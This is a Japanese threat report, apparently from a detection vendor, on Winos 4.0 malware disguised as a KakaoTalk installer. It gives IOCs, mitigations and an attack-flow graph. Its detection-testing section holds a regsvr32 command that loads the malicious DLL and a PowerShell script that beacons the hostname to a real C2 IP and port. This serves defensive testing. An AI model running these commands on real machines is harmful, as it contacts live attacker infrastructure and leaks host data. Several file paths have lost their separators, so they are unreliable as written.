KakaoTalkインストーラーに偽装するWinos 4.0マルウェア

Ruslan Mikhalov SOC Primeの脅威リサーチ責任者

フォローする

Detection stack

AIDR
Alert
ETL
Query

脅威レポート
攻撃フロー
検出
シミュレーション

概要

攻撃者はSEOポイズニングを悪用して偽のKakaoTalkインストーラーを検索結果の上位に押し上げました。このインストーラーは無効なコード署名証明書を持ち、Verifier.exeおよびAutoRecoverDat.dllを含む悪意のあるファイルを展開するNSISパッケージを埋め込んでいました。実行されると、マルウェアはDLL登録、スケジュールされたタスク、およびミューテックスを介して持続性を達成し、2つの別々のC2サーバーに接続しました。その能力には、スクリーンキャプチャ、システムプロファイリング、追加ペイロードのインメモリ実行が含まれていました。

調査

アーンラボセキュリティインテリジェンスセンターは、3月9日にキャンペーンを開始して以降、5,000台以上のPCが侵害されたと報告しました。分析では、暗号化されたNSISペイロードが復号してVerifier.exeとAutoRecoverDat.dllをドロップし、ミューテックスを作成し、GPUCache.xmlファイルからシェルコードをロードすることが示されました。シェルコードのブランチに応じて、マルウェアは192.238.129.47または119.28.70.225のC2インフラストラクチャに接触しました。持続性はDLL登録とスケジュールされたタスクによって維持され、Verifier.exeまたは rundll32 と共に悪意のあるDLLを起動します。

緩和策

組織は、キャンペーンに関連する悪意のあるドメインとダウンロードURLをブロックする必要があります。厳格なコード署名の検証を行い、無効な証明書を持つバイナリの実行を防ぎます。アプリケーションの許可リスト化を使用して、不明なNSISインストーラーの実行をブロックします。セキュリティチームは、報告書で概説されている特定のミューテックス、疑わしいスケジュールされたタスク、レジストリの変更を監視する必要があります。

対応策

検出チームは、ミューテックス 77825d8f-46d1-42d0-b298-83068bf9e31d の作成および MicrosoftWindowsAppID の下のスケジュールされたタスクについてアラートを出すべきです。ユーザープロファイルディレクトリ内の Verifier.exe と AutoRecoverDat.dll を狩り、既知のC2 IPとポートへのアウトバウンドトラフィックをブロックします。影響を受けたシステムの法医学的レビューを実施し、すべての持続性のアーティファクトと悪意のあるコンポーネントを完全に削除します。

“graph TB %% Class definitions classDef technique fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#cccccc classDef operator fill:#ff9900 %% Nodes – Techniques and Artifacts tech_initial_access[“Technique – T1593.002 Search Engine Poisoning Description: Manipulate SEO to rank malicious sites in search results.”] class tech_initial_access technique tech_user_exec[“Technique – T1204 User Execution Description: Victim runs malicious installer believing it to be legitimate.”] class tech_user_exec technique tech_obfuscation[“Technique – T1027 Obfuscated Files or Information Description: Payloads encrypted in NSIS installer and decrypted at runtime.”] class tech_obfuscation technique tech_powershell[“Technique – T1059.001 PowerShell Description: Executes PowerShell commands via cmd to modify Defender settings.”] class tech_powershell technique tech_exclusions[“Technique – T1564.012 File/Path Exclusions Description: Adds exclusion entries for C:, D:, E:, F: in Windows Defender.”] class tech_exclusions technique tech_rundll32[“Technique – T1218.011 Rundll32 Proxy Execution Description: Uses rundll32.exe to load malicious AutoRecoverDat.dll.”] class tech_rundll32 technique tech_appcert[“Technique – T1546.009 AppCert DLLs Description: Registers DLL for execution when AppCert loads, enabling persistence and escalation.”] class tech_appcert technique tech_schtask[“Technique – T1053 Scheduled Task/Job Description: Creates tasks to launch Verifier.exe and rundll32 at system startup.”] class tech_schtask technique tech_c2_nonstd[“Technique – T1571 Non-Standard Port Description: Communicates with C2 servers on ports 18852 and 443.”] class tech_c2_nonstd technique tech_port_knocking[“Technique – T1205.001 Port Knocking Description: Uses port knocking to hide C2 traffic.”] class tech_port_knocking technique tech_dynamic_res[“Technique – T1568 Dynamic Resolution Description: Resolves C2 addresses at runtime, adapts to presence of Chinese AV products.”] class tech_dynamic_res technique tech_indicator_removal[“Technique – T1027.005 Indicator Removal from Tools Description: Checks for specific AV products and alters persistence accordingly.”] class tech_indicator_removal technique tech_software_disc[“Technique – T1518.001 Software Discovery Description: Gathers installed software list for reconnaissance.”] class tech_software_disc technique tech_path_intercept[“Technique – T1574.009 Path Interception by Unquoted Path Description: Exploits unquoted service paths to load malicious DLL.”] class tech_path_intercept technique %% Nodes – Files / Payloads file_installer[“File: Malicious NSIS Installer (KakaoTalk_Setup_patched.RAR)”] class file_installer malware file_verifier[“File: Verifier.exe”] class file_verifier malware file_dll[“File: AutoRecoverDat.dll”] class file_dll malware %% Nodes – Commands / Processes proc_powershell[“Process: powershell.exe (adds Defender exclusions)”] class proc_powershell process proc_rundll32[“Process: rundll32.exe (loads AutoRecoverDat.dll)”] class proc_rundll32 process proc_schtask[“Process: schtasks.exe (creates scheduled tasks)”] class proc_schtask process %% Connections u2013 Attack Flow tech_initial_access –>|leads_to| tech_user_exec tech_user_exec –>|executes| file_installer file_installer –>|contains| tech_obfuscation tech_obfuscation –>|decrypts| file_verifier tech_obfuscation –>|decrypts| file_dll file_installer –>|calls| tech_powershell tech_powershell –>|executes| proc_powershell proc_powershell –>|adds| tech_exclusions file_installer –>|uses| tech_rundll32 tech_rundll32 –>|launches| proc_rundll32 proc_rundll32 –>|loads| file_dll tech_appcert –>|registers| file_dll tech_appcert –>|enables| tech_schtask tech_schtask –>|creates| proc_schtask proc_schtask –>|schedules| file_verifier proc_schtask –>|schedules| proc_rundll32 tech_appcert –>|provides| tech_path_intercept tech_path_intercept –>|facilitates| tech_appcert tech_c2_nonstd –>|used_by| file_verifier tech_c2_nonstd –>|used_by| file_dll file_verifier –>|communicates via| tech_port_knocking file_dll –>|communicates via| tech_port_knocking tech_port_knocking –>|relies_on| tech_dynamic_res tech_dynamic_res –>|detects| tech_indicator_removal tech_indicator_removal –>|modifies| tech_appcert file_installer –>|collects| tech_software_disc “

攻撃フロー

攻撃ストーリー＆コマンド:

攻撃者はすでに悪意のあるDLLを %LOCALAPPDATA%MicrosoftWindowsGPUCache ディレクトリ内に配置し、正規のキャッシュファイルとして偽装しています。ペイロードを実行するために、攻撃者は Regsvr32 (T1218.012)を利用してDLLを読み込み、ロードされたコンポーネントを使用してTCPポート18852（またはHTTPSポート443）を介してハードコーディングされたサーバー192.238.129.47へC2通信を開始します。このネットワークフローは、Sigmaルールが監視する観察可能な指標です。
1. Regsvr32で悪意のあるDLLをロード
```
regsvr32 /s "$env:LOCALAPPDATAMicrosoftWindowsGPUCacheGPUCache.xml"
```
2. C2ビーコンを開始 （悪意のあるDLLがC2サーバーへTCPソケットを開きます）。テスト用に、同じIP/ポートに接続する単純なPowerShell TCPクライアントでビーコンをエミュレートします。
```
$c2 = New-Object System.Net.Sockets.TcpClient('192.238.129.47',18852)
$stream = $c2.GetStream()
$payload = [System.Text.Encoding]::ASCII.GetBytes("Beacon from $env:COMPUTERNAME")
$stream.Write($payload,0,$payload.Length)
$stream.Close()
$c2.Close()
```

回帰テストスクリプト: 以下のスクリプトは、上記のステップをエンドツーエンドで再現し、Sigmaルールが期待する正確なネットワークテレメトリーを生成します。

# -------------------------------------------------
# Winos4.0 C2 シミュレーション - Sigmaルールをトリガー
# -------------------------------------------------
# 1. Regsvr32で悪意のある（シミュレーションされた）DLLをロード
$dllPath = "$env:LOCALAPPDATAMicrosoftWindowsGPUCacheGPUCache.xml"
if (Test-Path $dllPath) {
    Write-Host "[*] Regsvr32で悪意のあるDLLを登録中..."
    regsvr32 /s $dllPath
} else {
    Write-Error "[-] シミュレーションされたDLLが $dllPath に見つかりません - 中止します。"
    exit 1
}

# 2. ハードコーディングされたIP/ポートへのC2ビーコンをエミュレート
$c2IP   = '192.238.129.47'
$c2Port = 18852

Write-Host "[*] $c2IP:$c2Port へのTCP接続を確立中..."
try {
    $client = New-Object System.Net.Sockets.TcpClient($c2IP,$c2Port)
    $stream = $client.GetStream()
    $msg    = "Beacon from $env:COMPUTERNAME at $(Get-Date -Format o)"
    $bytes  = [System.Text.Encoding]::ASCII.GetBytes($msg)
    $stream.Write($bytes,0,$bytes.Length)
    Write-Host "[+] ビーコンを送信しました。"
} catch {
    Write-Error "[-] 接続失敗: $_"
} finally {
    if ($stream) { $stream.Close() }
    if ($client) { $client.Close() }
}
# -------------------------------------------------

クリーンアップコマンド: 一時的なアーティファクトを削除し、残存する接続を閉じます。

# テストアーティファクトである可能性があるシミュレーションされた悪意のあるDLLを削除
$dllPath = "$env:LOCALAPPDATAMicrosoftWindowsGPUCacheGPUCache.xml"
if (Test-Path $dllPath) {
    Remove-Item -Path $dllPath -Force
    Write-Host "[*] シミュレーションされたDLLをクリーンアップしました。"
}

# クライアント側のみであるため、残存するTCPリスナーは残らないはずです
Get-NetTCPConnection -RemoteAddress 192.238.129.47 -RemotePort 18852 | ForEach-Object {
    # アクションは必要ありません。接続はスクリプト内で閉じられます。
}

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加